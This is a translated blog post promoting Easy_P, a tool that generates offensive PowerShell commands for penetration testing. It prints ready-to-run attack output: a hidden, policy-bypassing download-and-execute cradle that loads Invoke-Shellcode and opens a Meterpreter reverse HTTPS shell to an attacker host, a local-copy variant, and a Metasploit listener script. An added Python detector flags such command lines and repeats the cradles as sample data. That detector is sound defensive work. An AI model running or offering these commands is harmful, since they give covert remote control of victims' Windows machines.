PowerShell is powerful, and not only for system administration. In day-to-day penetration testing we need PowerShell scripts to help carry out the work, for example to get past firewalls and similar controls, which is hard for anyone not familiar with PowerShell scripting. Fortunately someone has already thought of this and written a helper Python script that automatically generates commonly used PowerShell commands.
Easy_P GitHub address: https://github.com/cheetz/Easy-P.git
First, the introduction:
Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the user's needs.
PowerShell/WMI Generator
=========================================================
Easy_P | A Powershell / WMI Command Generator.
Written by Peter Kim <Author, The Hacker Playbook>
<CEO, Secure Planet LLC>
==================================================Easy-P==
-----------------------------------------------------
[1] Privilege Escalation
[2] Lateral Movement
[3] Keylogging
[4] PowerShell Meterpreter
[5] Change Users Execution Policy
[6] Powershell 101
[7] Base64 Encode a PowerShell Script
[8] Mimikatz - Passwords from Memory
[99] Exit/Quit
-----------------------------------------------------
We choose option 4 to generate a reverse Meterpreter script:
Select An Option: 4
[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell. Original: https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
LHOST: 192.168.1.103
LPORT: 55555
[*]Download from internet and execute:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force
[*]Run from a local copy of the script:
powershell.exe -exec bypass -Command "& {Import-Module .Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force}"
[*]Base64 encoded version download and execute:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc <base64-encoded command omitted>
[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your Kali box and load your handler with msfconsole -r listener.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.103
set LPORT 55555
set ExitOnSession false
exploit -j
As you can see, the PowerShell command is generated in three forms: download-and-execute from the network, execution from a local copy, and a Base64-encoded version. The other functions are left for readers to explore on their own; for reasons of length they are not covered here.
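From the defender's side, the three forms above share a small set of command-line traits (hidden window, execution-policy bypass, an encoded or downloaded script body, Invoke-Shellcode) that show up verbatim in process-creation logs. The following Python is an added example, not part of the original post or of Easy_P: it scores such command lines, decodes the -enc form so the hidden cradle can be matched too, and runs over constructed sample lines (the indicator names and the example.invalid host are ours).

```python
import base64
import re

# Indicator names are ours; each pattern is a switch or cmdlet seen in the Easy_P output above.
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("exec_policy_bypass", r"-exec(?:utionpolicy)?\s+bypass"),
    ("non_interactive", r"-noni(?:nteractive)?\b"),
    ("download_cradle", r"downloadstring|downloadfile|net\.webclient|invoke-webrequest"),
    ("invoke_expression", r"\biex\b|invoke-expression"),
    ("known_offensive_tooling", r"invoke-shellcode|meterpreter|reverse_https|reverse_tcp"),
]
STEALTH = {"hidden_window", "exec_policy_bypass", "non_interactive", "encoded_command"}
DELIVERY = {"download_cradle", "invoke_expression", "known_offensive_tooling"}
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind an -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command

def analyze(cmdline):
    """Classify one powershell.exe command line from a process-creation event."""
    hits = {name for name, pat in INDICATORS if re.search(pat, cmdline, re.I)}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:  # encoding hides the cradle, so scan the decoded body too
        hits.add("encoded_command")
        hits.update(name for name, pat in INDICATORS if re.search(pat, decoded, re.I))
    # One stealth switch alone is common in legitimate scheduled tasks; alert only
    # when stealth is paired with code-delivery or tooling evidence.
    return {"indicators": sorted(hits), "decoded": decoded,
            "suspicious": bool(hits & STEALTH) and bool(hits & DELIVERY)}

# Constructed sample log lines (the first is the Easy_P command printed above).
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient)"
    ".DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/"
    "CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload "
    "windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force",
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + ENCODED_CRADLE,
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
]
```

The same pairing rule flags the local-copy variant (bypass plus Invoke-Shellcode) while leaving the plain administrative command alone.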
This article was first published on the WeChat public account (milsec): Tool recommendation: Easy_P, a helper tool for generating commonly used PowerShell code